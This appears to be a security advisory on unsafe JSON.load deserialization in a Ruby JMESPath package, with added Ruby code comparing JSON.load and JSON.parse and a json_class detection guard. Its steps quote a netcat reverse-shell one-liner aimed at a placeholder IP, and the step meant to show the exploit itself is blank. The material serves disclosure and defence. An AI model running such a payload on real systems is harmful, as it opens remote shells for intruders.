Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load, which is considered unsafe when used with untrusted input.
2. To import the library, fire up the ‘Interactive Ruby Shell’ with the following command:
irb
3. In case you don’t have ‘irb’ installed, use the following command to install it:
gem install irb
4. Pick the desired payload; I have picked one from pentestmonkey:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f
5. Finally, import the vulnerable ‘JMESPath’ library and supply the payload to execute the reverse shell:
It is recommended to use JSON.parse instead of JSON.load. In this case, we observed that JSON.load failed to validate the input data, which leads to Remote Code Execution.
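The difference between the two calls, as an added example that is not part of the advisory or of the JMESPath project: JSON.load historically enables create_additions, so a document carrying a "json_class" key is turned into a call to that class's json_create and an object is instantiated; JSON.parse leaves the same document as a plain Hash. The sample document and the helper names (unsafe_load, safe_parse, contains_json_class?, parse_untrusted) are constructed for this demonstration; Range is used only because json/add/range makes it a harmless class to rebuild, the mechanism is the same for any class that responds to json_create. create_additions is passed explicitly so the result does not depend on which json gem version is installed.

```ruby
require 'json'
require 'json/add/range' # teaches Range how to be rebuilt from JSON (a harmless class for the demo)

# Constructed sample input: a document that names a class to instantiate.
# The "json_class" key is what JSON.load's create_additions acts on.
SAMPLE_DOC = '{"json_class":"Range","a":[1,5,false]}'.freeze

# What JSON.load does with such input: create_additions (its historical
# default, passed explicitly here) turns the "json_class" key into a
# constructor call, so data becomes a live object.
def unsafe_load(doc)
  JSON.load(doc, nil, create_additions: true)
end

# What JSON.parse does: create_additions is off by default, so the same
# document comes back as a plain Hash and no class is instantiated.
def safe_parse(doc)
  JSON.parse(doc)
end

# Defence in depth: flag documents that carry a "json_class" key anywhere,
# since a plain data document never needs one. Walks nested Hashes/Arrays.
def contains_json_class?(value)
  case value
  when Hash
    value.key?('json_class') || value.values.any? { |v| contains_json_class?(v) }
  when Array
    value.any? { |v| contains_json_class?(v) }
  else
    false
  end
end

# Parse untrusted input with JSON.parse and additionally refuse documents
# that look like serialized objects rather than data.
def parse_untrusted(doc)
  data = JSON.parse(doc)
  raise ArgumentError, 'refusing input with a json_class key' if contains_json_class?(data)
  data
end

if $PROGRAM_NAME == __FILE__
  puts "JSON.load  -> #{unsafe_load(SAMPLE_DOC).class}" # Range: an object was built from input
  puts "JSON.parse -> #{safe_parse(SAMPLE_DOC).class}"  # Hash: input stayed data
  begin
    parse_untrusted(SAMPLE_DOC)
  rescue ArgumentError => e
    puts "parse_untrusted rejected the document: #{e.message}"
  end
end
```

Replacing JSON.load with JSON.parse is the fix the advisory recommends; the extra json_class check is an additional guard for code paths where someone might later reintroduce create_additions, and it also gives a cheap detection signal (log every rejection) for inputs that were never meant to be plain data.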